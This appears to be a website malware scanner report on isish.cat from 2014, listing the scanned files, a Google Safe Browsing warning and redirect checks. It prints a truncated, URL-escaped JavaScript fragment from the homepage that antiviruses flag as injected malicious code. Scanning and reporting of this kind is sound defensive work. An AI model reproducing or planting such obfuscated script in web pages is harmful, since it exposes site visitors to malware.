Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=isish.cat
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://isish.cat/ | 200 OK Content-Length: 25822 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) text = unescape( '%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%20%09%09%0D%0A%77%69%6E%64%6F%77%2E%6E%62%5F%74%69%6D%65%73%5F%66%75%6E%63%74%69%6F%6E%5F%63%61%6C%6C%65%64%20%3D%20%30%3B%0D%0A%77%69%6E%64%6F%77%2E%74%65%73%74%5F%63%62%5F%66%6C%61%73%68%5F%68%65%61%64%65%72%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%20%20%7B%0D%0A%09%6E%62%5F%74%69%6D%65%73%5F%66%75%6E%63%74%69%6F%6E%5F%63%61%6C%6C%65%64%2B%2B%3B%0D%0A%09%69%66%20%28%6E%62%5F%74%69% window.nb_times_function_called = 0; window.test_cb_flash_header = function() { nb_times_function_called++; if(nb_times_function_called>0) {return true;} } Antivirus reports:
| ||
http://isish.cat/aspimagina/comu/js/scriptaculous-js-1.8.1/lib/prototype-1.6.0.2.js | 200 OK Content-Length: 130353 Content-Type: application/x-javascript | clean |
http://isish.cat/aspimagina/comu/js/scriptaculous-js-1.8.1/src/scriptaculous.js?load=effects | 200 OK Content-Length: 2654 Content-Type: application/x-javascript | clean |
http://isish.cat/aspimagina/comu/js/OverlayImages/lightview2.2.9.2/js/lightview.js | 200 OK Content-Length: 28822 Content-Type: application/x-javascript | clean |
http://isish.cat/js/AC_RunActiveContent.js | 200 OK Content-Length: 8403 Content-Type: application/x-javascript | clean |
http://isish.cat/cinemon09.pdf | 200 OK Content-Length: 300928 Content-Type: application/pdf | clean |
http://isish.cat/test404page.js | 404 Not Found Content-Length: 1282 Content-Type: text/html | clean |
http://isish.cat/images/fotos/nens1.jpg | 200 OK Content-Length: 148896 Content-Type: image/jpeg | clean |
http://isish.cat/images/fotos/nens2.jpg | 200 OK Content-Length: 206194 Content-Type: image/jpeg | clean |
http://isish.cat/images/fotos/nens3.jpg | 200 OK Content-Length: 128196 Content-Type: image/jpeg | clean |
http://isish.cat/images/fotos/nens4.jpg | 200 OK Content-Length: 125869 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: isish.cat
Result:
HTTP/1.1 200 OK
Date: Mon, 15 Sep 2014 17:08:27 GMT
Accept-Ranges: bytes
ETag: "f8b88cb84ecdcf1:0"
Server: Microsoft-IIS/7.5
Content-Length: 25822
Content-Type: text/html
Last-Modified: Wed, 10 Sep 2014 23:27:00 GMT
X-Powered-By: ASP.NET
...25822 bytes of data.
GET / HTTP/1.1
Host: isish.cat
Result:
HTTP/1.1 200 OK
Date: Mon, 15 Sep 2014 17:08:27 GMT
Accept-Ranges: bytes
ETag: "f8b88cb84ecdcf1:0"
Server: Microsoft-IIS/7.5
Content-Length: 25822
Content-Type: text/html
Last-Modified: Wed, 10 Sep 2014 23:27:00 GMT
X-Powered-By: ASP.NET
...25822 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: isish.cat
Referer: http://www.google.com/search?q=isish.cat
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: isish.cat
Referer: http://www.google.com/search?q=isish.cat
Result:
The result is similar to the first query. There are no suspicious redirects found.